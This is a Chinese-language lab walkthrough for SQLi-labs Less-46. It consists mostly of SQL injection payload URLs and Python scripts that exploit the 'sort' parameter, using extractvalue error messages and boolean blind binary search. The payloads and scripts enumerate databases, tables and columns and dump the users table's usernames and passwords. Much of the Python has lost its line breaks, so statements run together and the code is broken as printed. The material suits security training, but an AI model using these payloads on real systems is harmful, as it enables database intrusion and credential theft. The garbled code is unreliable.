目录

报错注入

直接注入

数据库名

数据库中的表名

users表结构：

users表数据：

python脚本注入

直接注入

获取数据库名

获取表名

获取表结构

获取数据

布尔盲注

获取数据库名

获取表名

获取表结构

获取数据

---

报错注入

直接注入

数据库名

当前数据库名：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 1,1))))

系统数据库名：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))

长度限制，使用截取函数substr()：

 http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))

数据库中的表名

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))

同理使用截取函数substr()：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))

users表结构：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))

users表数据：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))

python脚本注入

直接注入

获取数据库名

import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_database_names():database_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:db_name = match.group(1)database_names.append(db_name)print(f"成功提取数据库名: {db_name}")index += 1elif index == 0:print("找到数据库名，可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有数据库名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误，索引为 {index}: {e}")return database_namesif __name__ == "__main__":all_database_names = extract_database_names()

获取表名

import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_table_names(database_name):table_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:table_name = match.group(1)table_names.append(table_name)print(f"成功提取表名: {table_name}")index += 1elif index == 0:print("找到表名，可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有表名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误，索引为 {index}: {e}")return table_namesif __name__ == "__main__":database_name = "security"  # 目标数据库名all_table_names = extract_table_names(database_name)

获取表结构

import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_column_names(database_name, table_name):column_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:column_name = match.group(1)column_names.append(column_name)print(f"成功提取列名: {column_name}")index += 1elif index == 0:print("找到列名，可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有列名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误，索引为 {index}: {e}")return column_namesif __name__ == "__main__":database_name = "security"  # 目标数据库名table_name = "users"       # 目标表名all_column_names = extract_column_names(database_name, table_name)

获取数据

import requests
import retarget_url="http://sqli-labs:8013/Less-46/"def extract_user_data(database_name, table_name, record_id):# 提取 username 和 password 的数据data={}# 获取 usernamepayload_username={"sort": f"(extractvalue(1,concat(0x7e,(select username from {table_name} where id={record_id} limit 0,1))))"}# 获取 passwordpayload_password={"sort": f"(extractvalue(1,concat(0x7e,(select password from {table_name} where id={record_id} limit 0,1))))"}try:response_username=requests.get(target_url, params=payload_username, timeout=10)response_username.raise_for_status()match_username=re.search(r"XPATH syntax error: '~([^']+)", response_username.text)response_password=requests.get(target_url, params=payload_password, timeout=10)response_password.raise_for_status()match_password=re.search(r"XPATH syntax error: '~([^']+)", response_password.text)if match_username and match_password:username=match_username.group(1)password=match_password.group(1)data={'username': username, 'password': password}print(f"{username}:{password}")except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误，id={record_id}: {e}")return dataif __name__ == "__main__":database_name="security"  # 目标数据库名table_name="users"  # 目标表名record_id=1  # 从 id=1 开始while True:print(f"正在提取 id={record_id} 的数据...")user_data=extract_user_data(database_name, table_name, record_id)if not user_data:  # 如果没有提取到数据，则跳出循环print("没有更多数据，提取结束。")breakrecord_id+=1  # 继续下一个 id

布尔盲注

获取数据库名

import requests
from bs4 import BeautifulSoup# 获取页面中的用户名（用于判断SQL注入是否成功）
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取数据库名
def get_database_name():database_name = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakdatabase_name += chr(mid)i += 1print(f"Database Name: {database_name}")if __name__ == '__main__':get_database_name()

获取表名

import requests
from bs4 import BeautifulSoup# 获取页面中的用户名（用于判断SQL注入是否成功）
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取表名
def get_table_names():tables = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from \information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breaktables += chr(mid)i += 1print(f"Tables: {tables}")if __name__ == '__main__':get_table_names()

获取表结构

import requests
from bs4 import BeautifulSoup# 获取页面中的用户名（用于判断SQL注入是否成功）
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取列名
def get_column_names():columns = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from \information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakcolumns += chr(mid)i += 1print(f"Columns in 'users': {columns}")if __name__ == '__main__':get_column_names()

获取数据

import requests
from bs4 import BeautifulSoup# 获取页面中的用户名（用于判断SQL注入是否成功）
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取数据（如用户名:密码）
def get_user_data():user_data = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) \from users),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakuser_data += chr(mid)i += 1print(f"User Data (username:password): {user_data}")if __name__ == '__main__':get_user_data()